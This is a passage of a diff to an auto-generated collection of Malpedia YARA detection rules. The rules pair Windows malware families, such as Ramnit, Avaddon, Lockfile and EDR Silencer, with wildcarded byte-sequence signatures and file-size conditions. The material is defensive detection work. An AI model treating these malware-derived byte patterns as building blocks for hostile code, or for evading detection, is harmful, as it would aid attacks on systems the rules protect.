+		$sequence_0 = { c684243e02000036 c684243f02000014 c684244002000031 c684244102000031 }
+		$sequence_1 = { 488bd3 488d0d0f440200 e8???????? 33c9 85c0 480f44cb }
+		$sequence_2 = { 488d4c2450 e8???????? ba05000000 488d4c2448 e8???????? ba06000000 }
+		$sequence_3 = { b872000000 6689842452010000 b872000000 6689842454010000 b865000000 6689842456010000 }
+		$sequence_4 = { 8b442440 8b4c2444 03c8 8bc1 8bc8 ff15???????? 8b442424 }
+		$sequence_5 = { 488d4c2428 e8???????? 89442420 837c242000 7418 }
+		$sequence_6 = { 4889442428 eb1c 488b442420 4883c002 4889442420 488b442428 4883c002 }
+		$sequence_7 = { 4c8b442438 488d542420 488d4c2460 e8???????? 0fb6c0 85c0 7415 }
+		$sequence_8 = { 7363 488bf3 4c8d351b770100 83e63f 488beb 48c1fd06 48c1e606 }
+		$sequence_9 = { 488bc8 e8???????? 4c8d442440 488bd0 488b4c2448 e8???????? 488b842490000000 }
 
 	condition:
-		7 of them and filesize < 542720
+		7 of them and filesize < 458752
 }
-rule MALPEDIA_Win_Gh0Sttimes_Auto : FILE
+rule MALPEDIA_Win_Ramnit_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "aa640a7c-0e1b-5efd-8935-4547c6b03367"
+		id = "e7231016-af2a-574e-9bee-456d68202102"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gh0sttimes"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gh0sttimes_auto.yar#L1-L158"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ramnit_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "9c8e02eeb25677ec870ad4e3ac6e852e1b0822d6bc7051594b5abb6da5a926f8"
+		logic_hash = "a205fea822a311ab889bb108ee1640be8e7bb55400366f3eef4a7d603b69a5db"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110714,38 +110824,32 @@ rule MALPEDIA_Win_Gh0Sttimes_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bce 8bd6 8d85e0fdffff e8???????? 8b9dd8fdffff 56 }
-		$sequence_1 = { b804000000 8bcf 81f3d2b5a2c3 e8???????? }
-		$sequence_2 = { ff15???????? 8b5604 895608 ba00040000 }
-		$sequence_3 = { 894608 8b85e4fdffff 8b8de8fdffff 40 }
-		$sequence_4 = { 57 ff15???????? 8d443801 50 57 ff15???????? }
-		$sequence_5 = { 8b82ac000000 6a00 57 56 50 }
-		$sequence_6 = { ffd6 8b95f0fcffff 8b3d???????? 52 ffd7 68f4010000 }
-		$sequence_7 = { 753a 50 50 8d4d8c 51 50 }
-		$sequence_8 = { 488bcf e8???????? b902020000 488d542440 ff15???????? }
-		$sequence_9 = { 32c0 e9???????? 833d????????00 4889bc24e8000000 7412 }
-		$sequence_10 = { 48c747300f000000 48897728 488bcf 40887718 }
-		$sequence_11 = { 84c0 7515 488d8c24a0010000 e8???????? }
-		$sequence_12 = { 33d2 4d8b8938010000 4889442428 33c9 }
-		$sequence_13 = { 498d9550010000 498d8d98000000 41b804000000 e8???????? 498d8d00010000 }
-		$sequence_14 = { 03c2 0fb6c0 2bc2 410fb652fe }
-		$sequence_15 = { 48895c2408 4889742420 57 4881ecd0040000 }
+		$sequence_0 = { 8b7d08 b000 f2ae 8bc1 }
+		$sequence_1 = { 5f 59 5a 5b c9 c20800 55 }
+		$sequence_2 = { fd 8b4d10 8b7d0c 8b7508 f3a4 }
+		$sequence_3 = { 3a4510 7407 b800000000 eb02 8bc7 5a }
+		$sequence_4 = { ba00000000 59 5f 5e 5b c9 }
+		$sequence_5 = { ff7514 ff7510 e8???????? 83f800 750b 4f 3b7d08 }
+		$sequence_6 = { fc 8b4d0c 8b7d08 b000 f3aa }
+		$sequence_7 = { 52 8b4508 8b5d0c 4b 23d8 83fb00 740e }
+		$sequence_8 = { 8bf8 037d14 3b7df8 771f 8945fc ff7514 ff7510 }
+		$sequence_9 = { 8bec 83c4f8 56 57 51 53 52 }
 
 	condition:
-		7 of them and filesize < 548864
+		7 of them and filesize < 470016
 }
-rule MALPEDIA_Win_Virtualgate_Auto : FILE
+rule MALPEDIA_Win_Lockfile_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9ec48095-319c-5914-b4c7-b90192caa4ab"
+		id = "ce8b9f2d-3289-5da5-8ae6-f5695e030c37"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.virtualgate"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.virtualgate_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockfile"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lockfile_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "bdfea9aeb2fcf2d699fffd47ea03945e66306ca4f124485dd66c43c3284358f7"
+		logic_hash = "aad82c712a5f767aa5023ac75b23ae49a83688df028acae164a8fa13e666e8c1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110759,32 +110863,32 @@ rule MALPEDIA_Win_Virtualgate_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 418bc4 0f47c1 89442438 ffc8 8bf8 0fb68c82029a0100 }
-		$sequence_1 = { 66250100 7225 0100 7e25 0100 8a25???????? }
-		$sequence_2 = { 48894604 b906000000 48898620020000 0fb7c0 66f3ab 488d3d18470100 482bfe }
-		$sequence_3 = { 85c0 0f8483000000 488d8510030000 49c7c0ffffffff 49ffc0 42383400 }
-		$sequence_4 = { 488d15263d0100 e8???????? 8bcb 4885c0 740c }
-		$sequence_5 = { 488d0d30ecfeff 4c8945e7 4d03e8 48895df7 4c8be3 4c896db7 }
-		$sequence_6 = { 85c0 0f8403010000 488d0566080100 4a8b04e8 42385cf838 0f8ded000000 }
-		$sequence_7 = { 48895c2408 57 4883ec20 488d1d8fc60100 488d3d88c60100 }
-		$sequence_8 = { f30f6f0f 4883f80e 7773 8b848634270100 4803c6 }
-		$sequence_9 = { 4b8b8ce0f0250200 4803ca 48ffc2 468854f13e }
+		$sequence_0 = { 48f76328 498d0c00 488b4630 493bc8 4883d200 4c03e2 488955f7 }
+		$sequence_1 = { 48896c2418 56 4156 4157 4883ec30 498be9 4d8bf0 }
+		$sequence_2 = { c784249000000002000000 4c8bc7 488bd7 488d4c2420 e8???????? 90 4c8d4318 }
+		$sequence_3 = { 4898 488d0d74280700 8b542438 ffc2 8bd2 4c8b442430 418b1490 }
+		$sequence_4 = { e8???????? cc 4057 4883ec20 488b5110 }
+		$sequence_5 = { 498b4348 493bc8 4883d200 4c03e2 48895587 48f76650 4c8d0401 }
+		$sequence_6 = { 48f76118 4c894df0 4c8bea 488d0c03 483bcb 488b5d50 4983d500 }
+		$sequence_7 = { 4433d5 41c1c802 4403d0 81c59979825a 4503d3 448bda 4533d8 }
+		$sequence_8 = { 488d059fdf0700 bf04000000 48895c2450 4c8be1 8bd7 488d4c2460 6666660f1f840000000000 }
+		$sequence_9 = { 418bcd 4103d4 c1c90d 448b2424 4103d0 418bc5 4403e2 }
 
 	condition:
-		7 of them and filesize < 323584
+		7 of them and filesize < 1163264
 }
-rule MALPEDIA_Win_Onionduke_Auto : FILE
+rule MALPEDIA_Win_Onhat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4f0df2d9-b667-583c-9035-10a88bb5a5df"
+		id = "c03e9aab-ceb3-5936-af60-a6f47c0b4822"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.onionduke_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.onhat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.onhat_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "489b57dff2d63e712188fb4627ba779c8167a75fd93d25f277ce49d9d63a93ef"
+		logic_hash = "2683ee8ac88dff088a6e9025d3b65f7d07e7b813a5d7aa89913a323bd3055d20"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110798,71 +110902,71 @@ rule MALPEDIA_Win_Onionduke_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 8b7510 56 894df8 }
-		$sequence_1 = { 8b0f 83c404 5f 8919 }
-		$sequence_2 = { c645fc01 bf08000000 85c0 7417 8b4dd4 }
-		$sequence_3 = { c20c00 8b4d08 8b11 8b4214 56 6a01 ffd0 }
-		$sequence_4 = { 56 e8???????? 837de808 8bf0 720c 8b4dd4 51 }
-		$sequence_5 = { 8a08 40 84c9 75f9 2bc2 750e }
-		$sequence_6 = { ffd0 8b13 894508 8b4208 56 }
-		$sequence_7 = { c20400 8b03 50 e8???????? 83c404 56 ff15???????? }
-		$sequence_8 = { 8b4dfc 33cd e8???????? 8be5 5d c20400 837df408 }
-		$sequence_9 = { 8b4d08 2bd0 c1fa03 3bd1 770a 68???????? e8???????? }
+		$sequence_0 = { c684248c00000025 c684248d00000064 c684248e00000000 ffd6 83c40c }
+		$sequence_1 = { c644242956 885c242a c644242b50 c644242c4f c644242d52 }
+		$sequence_2 = { c644242761 c644242874 88442429 c644241c4e c644241d6f c644241e48 }
+		$sequence_3 = { 33d2 8a542432 8acf 50 51 }
+		$sequence_4 = { 66ab aa 55 8d442458 6a64 50 51 }
+		$sequence_5 = { 89442424 0f8404020000 8b4c2414 50 }
+		$sequence_6 = { 33c0 5e 83c414 c3 8b4c240c 51 }
+		$sequence_7 = { 55 8d442458 6a64 50 51 e8???????? }
+		$sequence_8 = { 6689542412 e8???????? 83f8ff 7507 33c0 5e 83c410 }
+		$sequence_9 = { 56 e8???????? b14f 83c408 884c2411 b020 884c241a }
 
 	condition:
-		7 of them and filesize < 671744
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Ripper_Atm_Auto : FILE
+rule MALPEDIA_Win_Unidentified_061_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8f521802-fe9f-59e3-95e4-5c6b679dd629"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ripper_atm"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ripper_atm_auto.yar#L1-L129"
+		id = "59888b60-a3e6-5e9f-a441-429646fe0731"
+		date = "2023-07-11"
+		modified = "2023-07-15"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_061"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_061_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "20a25cf7a57e29f6fcd47218cda1c983413d86161c6d93b073b8fbc3d2b6ce43"
+		logic_hash = "ee3ce5b6c77f09c690f7a934c26be09c58c4fcdee70275b61c00e527d8aa097d"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
+		malpedia_rule_date = "20230705"
+		malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41"
+		malpedia_version = "20230715"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 8bcc 89a57cfdffff 68???????? e8???????? }
-		$sequence_1 = { 2bc1 99 c745f818000000 f77df8 83c410 8945e8 85c9 }
-		$sequence_2 = { c7470411000000 897708 89770c 897710 c707???????? }
-		$sequence_3 = { c3 55 8bec 8b0d???????? 8b15???????? 8bc1 2bc2 }
-		$sequence_4 = { 8b4f3c 50 e8???????? 8b4f3c ff75fc 0fbec0 894744 }
-		$sequence_5 = { 7516 8b7708 8b4610 3b02 0f8d8e000000 ff7514 }
-		$sequence_6 = { 8b4de8 3b4810 7d27 8b4e08 ff7514 80790d00 51 }
-		$sequence_7 = { 68???????? 53 ff15???????? 56 56 50 8945fc }
-		$sequence_8 = { 8bf9 50 e8???????? ff7518 8d45ec ff7514 8bcf }
-		$sequence_9 = { 7409 6aff 53 50 e8???????? be???????? 56 }
+		$sequence_0 = { 8d85d4fdffff 50 e8???????? c9 }
+		$sequence_1 = { 89b5f0fdffff 899decfdffff 89b5f4feffff 899df0feffff ff15???????? 8945fc }
+		$sequence_2 = { 51 8365fc00 8d45fc 50 68???????? 6801000080 ff15???????? }
+		$sequence_3 = { 8945f0 0fb705???????? 50 ff15???????? 668945ee }
+		$sequence_4 = { 68???????? 56 ff15???????? 83c41c 8d4601 5e eb09 }
+		$sequence_5 = { 7417 03f3 3bf7 7ccb eb2f 7d29 }
+		$sequence_6 = { 83cfff c6457300 3b7566 7cb5 3b7566 }
+		$sequence_7 = { 53 57 6a04 33ff 33db }
+		$sequence_8 = { 5b c9 c20800 81ec00040000 68???????? 68???????? ff15???????? }
+		$sequence_9 = { eb04 c645fb3d 6a05 8d45f8 50 ff750c c645fc00 }
 
 	condition:
-		7 of them and filesize < 724992
+		7 of them and filesize < 360448
 }
-rule MALPEDIA_Win_Roopirs_Auto : FILE
+rule MALPEDIA_Win_Heloag_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "48848479-790a-5ff7-91e3-208639c13d18"
+		id = "8ed63d6a-bd5d-5cf3-8c24-b83f34a89c57"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopirs"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.roopirs_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.heloag_auto.yar#L1-L168"
 		license_url = "N/A"
-		logic_hash = "81aa2556d7e68cc4aaa84172c724098a8fdf541552ef6b7b19cd3ea7889cf5e4"
+		logic_hash = "2f5a3d733baee006935f8eba431242cec5f8a5f8274d648625719943963ee673"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110876,34 +110980,40 @@ rule MALPEDIA_Win_Roopirs_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 ff15???????? 50 8d55d0 52 ff15???????? 8d4dc8 }
-		$sequence_1 = { 7433 c745fc3e000000 8b4dd8 51 68???????? }
-		$sequence_2 = { ff15???????? 898544ffffff e9???????? c745fc07000000 8d5584 52 8b45dc }
-		$sequence_3 = { 8d45b8 50 ff15???????? 8bd0 8d4dd0 }
-		$sequence_4 = { 51 8b5508 8b4234 8b4d08 8b5134 8b0a 50 }
-		$sequence_5 = { 8d4dcc ff15???????? c745fc0d000000 6aff ff15???????? c745fc0e000000 }
-		$sequence_6 = { 8d4db8 ff15???????? 0fbf55b0 85d2 7433 c745fc2f000000 }
-		$sequence_7 = { 52 8b45b0 50 ff15???????? 898570ffffff eb0a c78570ffffff00000000 }
-		$sequence_8 = { ff15???????? 8d4db8 ff15???????? c745fc16000000 8b55d8 }
-		$sequence_9 = { 8b550c 8d4dd8 ff15???????? c745fc02000000 6a01 8b45d8 50 }
+		$sequence_0 = { 33c0 f3a5 8a0d???????? 8dbdadfdffff 888dacfdffff }
+		$sequence_1 = { a1???????? 6889130000 68???????? 8b4810 51 e8???????? 83f8ff }
+		$sequence_2 = { 3bc2 7e7f 33f6 ff15???????? 257f000080 7905 }
+		$sequence_3 = { 90 90 8b45e4 b919000000 25ffff0000 99 }
+		$sequence_4 = { 83c261 52 99 f7f9 8d85dcfdffff 83c261 52 }
+		$sequence_5 = { 50 68???????? ff15???????? 50 ffd3 8d8dd8fcffff }
+		$sequence_6 = { 99 f7f9 8b45c8 25ffff0000 }
+		$sequence_7 = { 8b0d???????? 8b15???????? 8985e0faffff 66a1???????? }
+		$sequence_8 = { 8b4e0c 3bcd 8b07 89442410 7464 }
+		$sequence_9 = { 50 53 8bcd ff15???????? 6a00 6a00 8bcd }
+		$sequence_10 = { 7505 a1???????? 894304 8b5608 895308 }
+		$sequence_11 = { f2ae f7d1 49 51 56 68???????? }
+		$sequence_12 = { 8b11 8bcf 52 6a00 50 }
+		$sequence_13 = { ff15???????? 8a4c2413 6a00 884c244c 8d4c244c }
+		$sequence_14 = { 53 68???????? 8d4c2420 ff15???????? }
+		$sequence_15 = { ff15???????? 84c0 7420 8b7d04 }
 
 	condition:
-		7 of them and filesize < 344064
+		7 of them and filesize < 401408
 }
-rule MALPEDIA_Win_Anchor_Auto : FILE
+rule MALPEDIA_Win_Unidentified_041_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bb15263f-399c-5701-ae36-ae60623792e3"
+		id = "9647b3bf-4e79-5038-aba8-fe9b062b7eaf"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.anchor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.anchor_auto.yar#L1-L210"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_041"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_041_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "00f136c31d3ac19e1483ba5e1be1e038dd18c931fe522c85d8ea96a7f9411021"
+		logic_hash = "ad11b25191c5069b1a65640fe7bbe0cd58f54821b3d55fbf4025b9ccae632082"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -110915,44 +111025,32 @@ rule MALPEDIA_Win_Anchor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c6400365 eb0a 66c74001646c c640036c }
-		$sequence_1 = { 740c 66c740016578 c6400365 eb0a }
-		$sequence_2 = { 8bf8 f7e6 0f90c1 f7d9 0bc8 51 e8???????? }
-		$sequence_3 = { c1e102 51 6a00 50 a3???????? e8???????? }
-		$sequence_4 = { b001 5d c3 e9???????? 6a0c 68???????? e8???????? }
-		$sequence_5 = { 66894818 33c9 8b4608 6689581a 8b4608 5b }
-		$sequence_6 = { 33c9 8b461c 6689781a 8b461c 5f }
-		$sequence_7 = { 50 56 e8???????? 83bde8feffff10 8d85d4feffff }
-		$sequence_8 = { b101 e8???????? e8???????? 84c0 }
-		$sequence_9 = { 0bc1 4898 488d0d12920200 488b5528 }
-		$sequence_10 = { 4889842440140000 488bd9 4c63d2 498bc2 418be9 48c1f806 488d0db8020100 }
-		$sequence_11 = { 03c2 c1f802 6bc003 894504 }
-		$sequence_12 = { 034524 3b8520010000 760c c785f400000001000000 }
-		$sequence_13 = { 4881e9c0000000 48c1e108 4803c8 8bc1 488d9405bf090000 eb0c 8bc7 }
-		$sequence_14 = { 0bc1 488b4d48 8801 488b4548 }
-		$sequence_15 = { 03c8 8bc1 8985a4000000 488d8da8010000 }
-		$sequence_16 = { 498bcf e8???????? 498bc7 488b8d90000000 }
-		$sequence_17 = { 7ce8 488b4350 4903d1 b945000000 66890c50 }
-		$sequence_18 = { 488bfa 7203 488b3a ba20000000 488bcf e8???????? 33db }
-		$sequence_19 = { 00040f 830905 0000 83bd641a0000ff }
-		$sequence_20 = { 05e0930400 894544 8b5544 488b4508 }
-		$sequence_21 = { 0000 83bd641a0000ff 0f85fc040000 c6859412000000 }
+		$sequence_0 = { 8913 8b4dfc 8bc3 5f 5e 33cd 5b }
+		$sequence_1 = { 668945be 59 668b440dbc 6603440ddc 6689440dbe 83c102 83f91e }
+		$sequence_2 = { ff7508 57 53 ff15???????? 83f8ff 74c4 eb03 }
+		$sequence_3 = { 5d c20800 8325????????00 c3 55 8bec 8b4508 }
+		$sequence_4 = { 85ff 7428 3bf9 741c 8b75f8 8bd9 6a00 }
+		$sequence_5 = { 8d4dc4 c645fc00 e8???????? 8b4dec 6a18 58 03c8 }
+		$sequence_6 = { ff7508 68???????? 6a40 50 e8???????? 83c414 8d8578ffffff }
+		$sequence_7 = { 57 33db 53 ff15???????? 85c0 7552 ff15???????? }
+		$sequence_8 = { 72ee 81fbffffff7f 76e6 57 53 8d4dc0 e8???????? }
+		$sequence_9 = { 5d c20400 6a1c b8???????? e8???????? 8bf1 33db }
 
 	condition:
-		7 of them and filesize < 778240
+		7 of them and filesize < 1097728
 }
-rule MALPEDIA_Win_Powerduke_Auto : FILE
+rule MALPEDIA_Win_Edr_Silencer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b1a14b33-ddbf-5df6-8a25-665602dd43b2"
+		id = "91d15ce1-a998-5572-89fb-85a860af50f1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.powerduke_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.edr_silencer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.edr_silencer_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "b0e443670552cebb99307ce5c81f7553239dfaab3a0b54a91654aba975b30757"
+		logic_hash = "36fd2a9fad325810fcce7416a9019a99b9100292037753c9fbfd0fd06391d993"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110966,32 +111064,32 @@ rule MALPEDIA_Win_Powerduke_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f8401030000 8945bc 6a00 6800400000 68???????? ff75bc ff15???????? }
-		$sequence_1 = { ebea ad 89c2 81fa68747470 0f8586010000 }
-		$sequence_2 = { 681b000200 6a00 68???????? 6801000080 ff15???????? 09c0 0f8597000000 }
-		$sequence_3 = { 7518 8d85f4f7ffff 6800040000 50 ff35???????? ff15???????? 8d85f4f7ffff }
-		$sequence_4 = { 6a00 ff35???????? ff15???????? c705????????00000000 837dfc01 }
-		$sequence_5 = { 55 ff15???????? 5a 59 }
-		$sequence_6 = { c745fc01000000 eb11 c745d001000000 8b451c }
-		$sequence_7 = { 7403 41 ebf1 c6040e00 51 }
-		$sequence_8 = { 7419 a3???????? ff7514 50 ff15???????? c705????????01000000 31c0 }
-		$sequence_9 = { ff75e4 ff15???????? ff75c4 ff15???????? }
+		$sequence_0 = { e8???????? 898524030000 83bd2403000000 0f84b1000000 83bd2403000005 }
+		$sequence_1 = { e8???????? 85c0 0f84b7000000 4183ee57 4189fd 6690 }
+		$sequence_2 = { 488d154a7b0000 89442420 488d4c243e 480f44da 4c89e2 }
+		$sequence_3 = { 4889c1 488b05???????? ffd0 b801000000 4883c450 }
+		$sequence_4 = { 488b85d8010000 488b00 488b4008 4885c0 }
+		$sequence_5 = { e8???????? b801000000 e9???????? e8???????? 85c0 750a b801000000 }
+		$sequence_6 = { 4889c1 e8???????? 8945f8 837df800 7416 8b45f8 }
+		$sequence_7 = { b900000000 e8???????? 8945f8 837df800 7416 8b45f8 }
+		$sequence_8 = { 48894558 488b8518030000 488d4db0 488d5510 4989c9 }
+		$sequence_9 = { 488b05???????? ffd0 89c2 488d0d5fc70000 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 744448
 }
-rule MALPEDIA_Win_Cryptoshuffler_Auto : FILE
+rule MALPEDIA_Win_M0Yv_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "998eec42-f040-507e-9bef-931d28600d2d"
+		id = "9a129bc6-2344-5ff6-a3ef-18a2b58317ac"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshuffler"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cryptoshuffler_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.m0yv"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.m0yv_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "2eb7cd664cf23b0f4478f6fc772120b42235dfe3815c8e843a34a2664a62760c"
+		logic_hash = "187d793321c420f42e54cfca36e40f43e077f8b56c43ac66dc5d6006d88beffc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111005,34 +111103,34 @@ rule MALPEDIA_Win_Cryptoshuffler_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 660f282d???????? 660f59f5 660f28aa20a50210 660f54e5 660f58fe }
-		$sequence_1 = { 8d0486 894304 5f 8933 }
-		$sequence_2 = { f6c11f 0f85ad040000 8b41fc 3bc1 0f83a2040000 }
-		$sequence_3 = { 83f85b 757d 8b06 8b4e08 3bc1 }
-		$sequence_4 = { 837e4c29 8ad8 0f85fd000000 8b06 8b4e08 3bc1 }
-		$sequence_5 = { c7401c00000000 c7402000000000 8906 894604 8b4508 89460c 8bc6 }
-		$sequence_6 = { 8b4508 83c020 50 ff15???????? 5d c3 6a0a }
-		$sequence_7 = { e8???????? 8bce e8???????? 837e4cff b101 0f8555fcffff }
-		$sequence_8 = { 8d45b4 89458c 8d458c 51 50 51 e8???????? }
-		$sequence_9 = { 6685c0 0f84e7000000 6a00 8d4e24 }
+		$sequence_0 = { 4589d1 41c1f919 4501c1 4589c8 41c1f81a 4501d8 8811 }
+		$sequence_1 = { 4889ce e8???????? 31ff 4885db 744f 85c0 744b }
+		$sequence_2 = { 7418 4180783c02 755f 418ac3 24f0 3c40 7556 }
+		$sequence_3 = { 4801d8 480500000001 4803542420 4889c5 }
+		$sequence_4 = { b918000000 ff10 4885c0 740b c70002000000 897008 eb02 }
+		$sequence_5 = { 4d89ea 4a035cee08 4831cf 4889c1 48c1c11e 4889c6 4931fc }
+		$sequence_6 = { 4889f2 e8???????? 4c89e1 4c89e2 4989d8 e8???????? 4c8d4778 }
+		$sequence_7 = { 4869c2182d0700 4901c3 4c69d5d1150200 4d01fa 4869c267fb0900 }
+		$sequence_8 = { 4889dd 480fafee 4889ac2488000000 4c8d3c36 480faff6 4801ce 48635810 }
+		$sequence_9 = { b918000000 ff17 4885c0 7433 4889c6 c70006000000 }
 
 	condition:
-		7 of them and filesize < 425984
+		7 of them and filesize < 779264
 }
-rule MALPEDIA_Win_Friedex_Auto : FILE
+rule MALPEDIA_Win_Avaddon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "87cac36d-65df-59c3-8519-a2beb3554903"
+		id = "0c31fafc-c10e-58b1-9fee-fb7be191e4b5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.friedex_auto.yar#L1-L178"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avaddon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.avaddon_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "63043516012ac32e3e6d0450f407dc7719100d4d30f90ebfdb7b7cb46cef3e98"
+		logic_hash = "157dd793c1260894e97de0f6c4ec6c5a408218110364a6a1e7630b93b4914514"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -111044,38 +111142,32 @@ rule MALPEDIA_Win_Friedex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 85c0 7403 53 ffd0 6880000000 33db }
-		$sequence_1 = { 5f 5e 5d 5b 59 c20400 8b4c2404 }
-		$sequence_2 = { e8???????? 6a2f 8bc8 e8???????? 6a62 8bc8 e8???????? }
